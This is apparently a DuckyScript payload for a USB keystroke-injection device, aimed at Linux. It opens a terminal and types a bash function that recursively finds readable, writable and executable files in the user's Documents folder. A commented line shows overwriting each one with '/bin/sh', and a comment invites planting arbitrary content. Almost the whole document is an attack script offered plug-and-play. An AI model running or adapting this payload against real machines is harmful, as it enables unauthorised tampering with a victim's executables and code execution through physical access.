REM ################################################ REM # | REM # Title : Exploiting An Executable File | REM # Author : Aleff | REM # Version : 1.0 | REM # Category : Execution | REM # Target : Linux | REM # | REM ################################################ REM Requirements: REM - Nothing, it is Plug-And-Play but you can change it as you want. DELAY 1000 CTRL-ALT t DELAY 2000 REM #### Script #### STRINGLN_BLOCK function search_file { for file in "$1"/*; do if [[ -d "$file" ]]; then search_file "$file"; elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then echo "File Found: $file"; # You can put whatever you want into the executable file # echo "/bin/sh" > "$file" fi done } USER=$(whoami); # You can choose whatever folder you want, the script is recursive. DIR=/home/$USER/Documents; search_file "$DIR"; END_STRINGLN ENTER